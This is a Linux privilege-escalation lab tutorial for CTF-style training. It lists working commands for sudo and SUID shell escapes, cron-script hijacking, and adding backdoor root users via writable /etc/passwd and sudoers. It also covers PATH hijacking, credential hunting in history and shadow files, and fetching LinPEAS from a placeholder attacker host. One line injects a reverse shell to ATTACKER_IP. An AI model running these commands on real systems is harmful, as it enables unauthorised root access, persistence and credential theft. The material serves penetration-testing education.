๐ฏ Lab Objectives
- Enumerate the target system thoroughly before attempting escalation
- Identify and exploit sudo misconfigurations using GTFOBins
- Find and abuse SUID/SGID binaries
- Detect writable cron job scripts and hijack them
- Exploit weak file permissions on sensitive files
- Use linpeas to automate privilege escalation enumeration
Step 1 โ System Enumeration
# OS and kernel version
uname -a
cat /etc/os-release
cat /proc/version
# Hostname and network
hostname
ip a
cat /etc/hosts
# Running processes
ps aux
ps aux | grep root
# Listening services
ss -tulnp
netstat -tulnpStep 2 โ Current User Context
# Who are we?
whoami
id
groups
# What can we read?
cat /etc/passwd
cat /etc/shadow # only if world-readable (misconfiguration!)
# Check home directories
ls -la /home/
ls -la ~/.ssh/
# History files โ may contain passwords
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.nano_historyStep 3 โ Sudo Rights
Check what the current user can run as sudo โ this is often the fastest path to root.
# List sudo permissions
sudo -l
# Common exploitable sudo entries:
# (ALL) NOPASSWD: /usr/bin/vim โ vim can spawn a shell
# (ALL) NOPASSWD: /usr/bin/find โ find -exec can run commands
# (ALL) NOPASSWD: /usr/bin/python3 โ spawn a shell directly
# GTFOBins exploits (check gtfobins.github.io)
# Exploit sudo vim
sudo vim -c ':!/bin/bash'
# Exploit sudo find
sudo find . -exec /bin/bash \; -quit
# Exploit sudo python3
sudo python3 -c 'import os; os.system("/bin/bash")'
# Exploit sudo less/more (shell escape)
sudo less /etc/passwd
# Then type: !/bin/bashStep 4 โ SUID Binaries
SUID binaries run with the file owner's permissions (usually root). If a SUID binary can run arbitrary commands, you can escalate.
# Find all SUID binaries
find / -perm -u=s -type f 2>/dev/null
# Find SUID owned by root specifically
find / -user root -perm -4000 -type f 2>/dev/null
# Common exploitable SUID binaries:
# bash with SUID set
/bin/bash -p # -p preserves SUID privileges
# nmap (older versions)
nmap --interactive
# Then: !sh
# cp โ overwrite /etc/passwd
# Generate password hash: openssl passwd -1 -salt xyz hacker
# Add root2:$1$xyz$hash:0:0:root:/root:/bin/bash to /etc/passwd
# Then: su root2
# Custom SUID binary calling system() without full path
# Check with: strings /path/to/suid-binary | grep -v "/"Step 5 โ Cron Jobs
# System-wide crontab
cat /etc/crontab
cat /etc/cron.d/*
ls /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/
# User crontabs
crontab -l
cat /var/spool/cron/crontabs/* 2>/dev/null
# Find writable scripts called by cron
# If /etc/crontab runs: * * * * * root /opt/backup.sh
# And backup.sh is world-writable:
ls -la /opt/backup.sh
# Inject reverse shell into writable cron script
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.shStep 6 โ Writable Sensitive Files
# Find world-writable files
find / -writable -type f 2>/dev/null | grep -v proc
# Writable /etc/passwd = instant root
# Generate password hash
openssl passwd -1 -salt hack hacker123
# Append new root user
echo 'hacker:$1$hack$...:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker # enter hacker123
# Writable /etc/sudoers
echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
sudo suStep 7 โ PATH Hijacking
# If a SUID binary calls a command without full path:
# strings /usr/local/bin/suid_program โ shows "service" (no /usr/sbin/service)
# Create malicious 'service' binary in /tmp
echo '#!/bin/bash' > /tmp/service
echo '/bin/bash -p' >> /tmp/service
chmod +x /tmp/service
# Prepend /tmp to PATH so our binary is found first
export PATH=/tmp:$PATH
# Run the SUID program โ it calls our fake 'service'
/usr/local/bin/suid_programStep 8 โ Linux Capabilities
# Find binaries with capabilities set
getcap -r / 2>/dev/null
# Dangerous capabilities:
# cap_setuid+ep โ can change UID to root
# cap_net_raw+ep โ raw packet access
# cap_dac_override+ep โ bypass file permissions
# Python with cap_setuid:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid:
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'Step 9 โ Kernel Exploits
Kernel exploits can crash the system. Use as a last resort only, and never on production systems.
# Get kernel version
uname -r
# e.g. 3.13.0-24 โ DirtyCow (CVE-2016-5195)
# Use linux-exploit-suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
bash linux-exploit-suggester.sh
# Metasploit post module
use post/multi/recon/local_exploit_suggester
set SESSION 1
runStep 10 โ Automate with LinPEAS
# Transfer linpeas to target (from attacker machine)
# On attacker: python3 -m http.server 8080
# On target:
wget http://ATTACKER_IP:8080/linpeas.sh -O /tmp/linpeas.sh
curl http://ATTACKER_IP:8080/linpeas.sh -o /tmp/linpeas.sh
# Run LinPEAS
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh 2>/dev/null | tee /tmp/linpeas_output.txt
# Focus on red/yellow highlighted items first
# Key sections to review:
# - Sudo version (check for CVEs)
# - SUID binaries
# - Interesting files (passwords, keys)
# - Cron jobs
# - Network connections๐ PrivEsc Checklist
- โ
sudo -lโ Check sudo rights, cross-reference GTFOBins - โ
find / -perm -u=s 2>/dev/nullโ SUID binaries - โ
cat /etc/crontabโ Cron jobs running as root - โ
find / -writable -type f 2>/dev/nullโ Writable files - โ
getcap -r / 2>/dev/nullโ Linux capabilities - โ
cat ~/.bash_historyโ Command history with passwords - โ
ls -la /etc/passwd /etc/shadowโ File permissions - โ
uname -r+ linux-exploit-suggester โ Kernel exploits - โ Run LinPEAS for automated full enumeration
Lab Complete! You now have a systematic approach to Linux privilege escalation. Every CTF machine and real engagement uses these same techniques.